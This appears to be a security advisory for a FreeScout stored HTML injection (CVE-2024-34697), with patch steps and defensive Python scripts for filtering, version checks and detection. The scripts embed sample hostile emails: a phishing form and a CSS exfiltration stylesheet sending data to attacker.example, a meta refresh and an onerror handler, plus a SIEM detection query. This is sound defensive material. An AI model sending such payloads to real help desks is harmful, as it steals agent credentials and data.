CVE-2024-34697

7.6 HIGH

📋 TL;DR

A stored HTML injection vulnerability in FreeScout's email reception module lets an unauthenticated attacker inject HTML markup into the help desk simply by sending an email to a mailbox the instance fetches. The injected markup is stored with the conversation and rendered in the browser of every agent who opens it, within the application's own origin. All FreeScout instances before version 1.8.139 that receive external email are affected.

💻 Affected Systems

Products:
  • FreeScout
Versions: All versions before 1.8.139
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects instances that receive email from external sources. Instances whose monitored mailboxes accept mail from internal senders only are less exposed, but any sender who can reach a monitored mailbox can deliver the payload.

📦 What is this software?

FreeScout is a free, open-source, self-hosted help desk and shared mailbox application written in PHP on the Laravel framework. Support agents read and answer customer email from a web interface, which is why the content of inbound email ends up rendered in an agent's browser.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker could hijack forms (a fake login prompt inside a ticket that posts agent credentials to an attacker-controlled host), deface the agent interface, or exfiltrate data present on the page, such as values in input fields, with CSS attribute-selector injection.

🟠

Likely Case

Attackers inject HTML that draws a convincing phishing form or "session expired" prompt in the ticket view, or redirects agents to an attacker-controlled site (for example via a meta refresh), compromising agent accounts and the help desk data those accounts can read.

🟢

If Mitigated

With the fix applied, inbound email markup is sanitized before rendering: dangerous elements and attributes are stripped or escaped, so the email still displays but the attacker's form, stylesheet or redirect never reaches the agent's browser.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only sending a crafted email to a mailbox that the FreeScout instance polls; the payload takes effect when an agent opens the conversation. No authentication to FreeScout is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.8.139

Vendor Advisory: https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-985r-6qfc-hg8m

Restart Required: Yes

Instructions:

1. Back up your FreeScout instance and database.
2. Update to version 1.8.139 or later via the built-in updater or a manual installation.
3. Restart the web server and any related services (PHP-FPM and the queue worker, if you run one).
4. Verify the update completed successfully: the version shown in the admin interface should read 1.8.139 or later.

🔧 Temporary Workarounds

Disable HTML email processing (Platform: all)

Configure FreeScout to process emails as plain text only, stripping all HTML content. Validate on a staging instance that your build actually exposes such a setting before relying on it, and expect legitimate formatting in every customer email to be lost.

Email filtering at gateway (Platform: all)

Implement external email filtering (a milter, mail gateway rule or pre-delivery script) that strips or converts HTML parts of incoming email before the messages reach FreeScout.
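The gateway-side workaround above, as an added example that is not FreeScout code and not from the vendor advisory: a filter that converts every text/html MIME part of an inbound message into text/plain before the message is handed to the help desk. It uses only the Python standard library; the sample message (a phishing form plus a CSS exfiltration stylesheet) is constructed here for the demonstration.

```python
"""Gateway filter: convert text/html MIME parts to text/plain before delivery.

Added example, not FreeScout code. Standard library only.
"""
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Elements whose body is never user-visible text. Dropping them also removes
# inline CSS (the CSS-exfiltration vector) and scripts.
DROP_BODY = {"script", "style", "head", "title"}
# Elements that should produce a line break in the plain-text rendering.
BLOCK = {"p", "div", "br", "tr", "li", "h1", "h2", "h3", "h4", "form", "table"}


class TextExtractor(HTMLParser):
    """Collects visible text; attributes (form actions, URLs) are discarded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self._chunks = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_BODY:
            self._skip += 1
        elif tag in BLOCK:
            self._chunks.append("\n")

    def handle_endtag(self, tag):
        if tag in DROP_BODY and self._skip:
            self._skip -= 1
        elif tag in BLOCK:
            self._chunks.append("\n")

    def handle_data(self, data):
        if not self._skip:
            self._chunks.append(data)

    def text(self) -> str:
        lines = (" ".join(l.split()) for l in "".join(self._chunks).splitlines())
        return "\n".join(l for l in lines if l)


def html_to_text(html: str) -> str:
    p = TextExtractor()
    p.feed(html)
    p.close()
    return p.text()


def strip_html_parts(raw: bytes) -> bytes:
    """Return the message with every text/html part replaced by text/plain."""
    msg = message_from_bytes(raw, policy=policy.default)
    # Collect first, then mutate: walk() iterates the live MIME tree.
    html_parts = [p for p in msg.walk() if p.get_content_type() == "text/html"]
    for part in html_parts:
        text = html_to_text(part.get_content())
        # set_content clears the old Content-* headers (including the transfer
        # encoding) and re-encodes the part as text/plain.
        part.set_content(text)
    return msg.as_bytes()


def has_html_part(raw: bytes) -> bool:
    msg = message_from_bytes(raw, policy=policy.default)
    return any(p.get_content_type() == "text/html" for p in msg.walk())


def build_sample() -> bytes:
    """Constructed inbound message: phishing form plus an exfiltrating stylesheet."""
    msg = EmailMessage()
    msg["From"] = "Customer <customer@example.net>"
    msg["To"] = "support@example.com"
    msg["Subject"] = "Order problem"
    msg.set_content("Please see the HTML version.")
    msg.add_alternative(
        "<html><head><style>input[value^='a']{background:url(https://attacker.example/a)}"
        "</style></head><body><p>Hi, my order never arrived.</p>"
        "<form action='https://attacker.example/login'>Session expired, please log in:"
        "<input name='password' type='password'><input type='submit'></form></body></html>",
        subtype="html")
    return msg.as_bytes()


if __name__ == "__main__":
    print(strip_html_parts(build_sample()).decode())
```

The visible text of the email survives, so agents can still read it, while the form action, the stylesheet and every attribute value are gone; a multipart/alternative message ends up with two text/plain parts, which mail parsers handle without complaint.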

🧯 If You Can't Patch

  • Implement a strict Content Security Policy (CSP): `form-action` limited to your own origin is what blunts form hijacking, and `style-src` without `'unsafe-inline'` blocks injected `<style>` blocks. CSP does not stop plain phishing text, images or links, so it reduces impact rather than removing it.
  • Monitor incoming email logs for suspicious HTML patterns (forms posting to external hosts, inline stylesheets, meta refresh) and block the senders

🔍 How to Verify

Check if Vulnerable:

Check your FreeScout version in the admin interface or in the `'version'` entry of `config/app.php` in the install directory. If the version is below 1.8.139, you are vulnerable.

Check Version:

Check the version displayed in the FreeScout admin interface, or read it from `config/app.php` on the server. Compare versions numerically, not as strings: "1.8.99" sorts after "1.8.139" lexicographically but is an older release.
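A version check for the threshold above, as an added example (not FreeScout code). It assumes the install's `config/app.php` carries a `'version' => 'X.Y.Z'` entry; the configuration excerpt embedded below is constructed for the demonstration, and the numeric comparison is the point: a plain string compare would rank 1.8.99 above 1.8.139.

```python
"""Check a FreeScout install against the CVE-2024-34697 fix version.

Added example, not FreeScout code. Assumes config/app.php contains
'version' => 'X.Y.Z' (confirm against your own install).
"""
import re
from pathlib import Path

FIXED_VERSION = "1.8.139"
VERSION_RE = re.compile(r"""['"]version['"]\s*=>\s*['"]([0-9]+(?:\.[0-9]+)*)['"]""")


def parse_version(v: str) -> tuple:
    """'1.8.138' -> (1, 8, 138) so that comparison is numeric per component."""
    return tuple(int(x) for x in v.split("."))


def version_from_config(config_text: str) -> str:
    m = VERSION_RE.search(config_text)
    if not m:
        raise ValueError("no 'version' => '...' entry found in config text")
    return m.group(1)


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    # Numeric compare: as strings, "1.8.99" > "1.8.139" would wrongly read as fixed.
    return parse_version(version) < parse_version(fixed)


def check_install(root: str) -> tuple:
    """Read <root>/config/app.php and return (version, vulnerable)."""
    text = Path(root, "config", "app.php").read_text(encoding="utf-8")
    v = version_from_config(text)
    return v, is_vulnerable(v)


# Constructed excerpt of a config/app.php from a pre-fix install.
SAMPLE_CONFIG = """
return [
    'name' => env('APP_NAME', 'FreeScout'),
    'version' => '1.8.138',
    'env' => env('APP_ENV', 'production'),
];
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        version, vulnerable = check_install(sys.argv[1])
    else:
        version = version_from_config(SAMPLE_CONFIG)
        vulnerable = is_vulnerable(version)
    state = "VULNERABLE" if vulnerable else "fixed"
    print(f"FreeScout {version}: {state} (fix in {FIXED_VERSION})")
```

Run it with the FreeScout install directory as the only argument (`python check_version.py /var/www/freescout`, path assumed); with no argument it evaluates the embedded sample.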

Verify Fix Applied:

After updating to 1.8.139 or later, send a test email to the instance containing an HTML form whose action points at a host you control, an inline `<style>` block and a meta refresh, then open the conversation as an agent: no input fields or redirect should render, and no request should arrive at your host.

📡 Detection & Monitoring

Log Indicators:

  • Unusual HTML patterns in the email fetch logs (forms, inline stylesheets, meta refresh or base tags in inbound message bodies)
  • Repeated fetch or parse errors on messages carrying complex HTML

Network Indicators:

  • Inbound mail at the gateway whose HTML posts forms to, or loads stylesheets and frames from, hosts outside your organisation
  • New or rarely seen senders delivering HTML-heavy messages to support mailboxes

SIEM Query:

source="freescout-logs" AND (message="email processing" OR message="HTML content") AND (content="<script" OR content="javascript:" OR content="onclick=" OR content="<form" OR content="<style" OR content="<meta http-equiv" OR content="<base " OR content="<iframe")

The source, message and content fields are placeholders to map onto your own log schema. A signature limited to `<script>` and event handlers misses the primitives this CVE actually enables (forms, stylesheets, redirects), which is why the form, style, meta and base terms are included.
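The detection logic behind that query, as an added example (not FreeScout code): a scanner that inspects email HTML for the HTML-injection primitives a script-only signature misses (phishing forms and password fields, CSS attribute-selector exfiltration, meta refresh, base-URL override, embedded frames) alongside the usual `on*` handlers and `javascript:` URLs. The sample messages are constructed; the attacker host names are placeholders.

```python
"""Scan email HTML for HTML-injection primitives, not just <script>.

Added example, not FreeScout code. Sample messages are constructed.
"""
import re
from html.parser import HTMLParser

# Attribute-selector rule that loads a URL: the CSS exfiltration shape,
# e.g. input[name='_token'][value^='a']{background:url(https://x/a)}
CSS_EXFIL_RE = re.compile(r"\[[^\]]*[\^$*]?=[^\]]*\]\s*\{[^}]*url\(", re.I | re.S)
CSS_IMPORT_RE = re.compile(r"@import\b", re.I)


class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []          # list of (kind, detail)
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.findings.append(("form_hijack", a.get("action", "")))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password_field", a.get("name", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta_refresh", a.get("content", "")))
        elif tag == "base":
            self.findings.append(("base_override", a.get("href", "")))
        elif tag in ("iframe", "object", "embed"):
            self.findings.append(("embedded_frame", a.get("src") or a.get("data", "")))
        elif tag == "style":
            self._in_style = True
        # Script vectors the classic signatures already cover.
        for k, v in a.items():
            if k.startswith("on") or v.lstrip().lower().startswith("javascript:"):
                self.findings.append(("script_handler", f"{k}={v}"))
        if "url(" in a.get("style", "").lower():
            self.findings.append(("inline_style_url", a["style"]))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # <style> bodies arrive here verbatim; look for exfiltration rules.
        if self._in_style and (CSS_EXFIL_RE.search(data) or CSS_IMPORT_RE.search(data)):
            self.findings.append(("css_exfil", " ".join(data.split())[:80]))


def scan_html(html: str) -> list:
    s = InjectionScanner()
    s.feed(html)
    s.close()
    return s.findings


def scan_messages(messages) -> dict:
    """messages: iterable of (sender, subject, html). Returns {"sender | subject": kinds}."""
    report = {}
    for sender, subject, html in messages:
        kinds = sorted({kind for kind, _ in scan_html(html)})
        if kinds:
            report[f"{sender} | {subject}"] = kinds
    return report


# Constructed sample inbound messages (one benign, three malicious).
SAMPLE_MESSAGES = [
    ("alice@example.net", "Re: ticket 42",
     "<p>Hi, <b>thanks</b> for the quick reply.</p>"),
    ("billing@attacker.example", "Invoice overdue",
     "<p>Your session has expired.</p>"
     "<form action='https://attacker.example/login'>"
     "<input name='email'><input type='password' name='password'>"
     "<input type='submit' value='Sign in'></form>"),
    ("noreply@attacker.example", "Delivery failure",
     "<style>input[name='_token'][value^='a']{background:url(https://attacker.example/t/a)}"
     "</style><p>Message could not be delivered.</p>"),
    ("promo@attacker.example", "Special offer",
     "<meta http-equiv='refresh' content='0;url=https://attacker.example/'>"
     "<img src=x onerror='alert(1)'>"),
]

if __name__ == "__main__":
    for key, kinds in scan_messages(SAMPLE_MESSAGES).items():
        print(key, "->", ", ".join(kinds))
```

Point it at the raw HTML bodies your gateway or fetch log captures; the benign reply produces no findings, while the three hostile samples are flagged as form hijacking with a password field, CSS exfiltration, and a meta refresh plus an event handler respectively.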

🔗 References

  • Vendor advisory (GHSA-985r-6qfc-hg8m): https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-985r-6qfc-hg8m
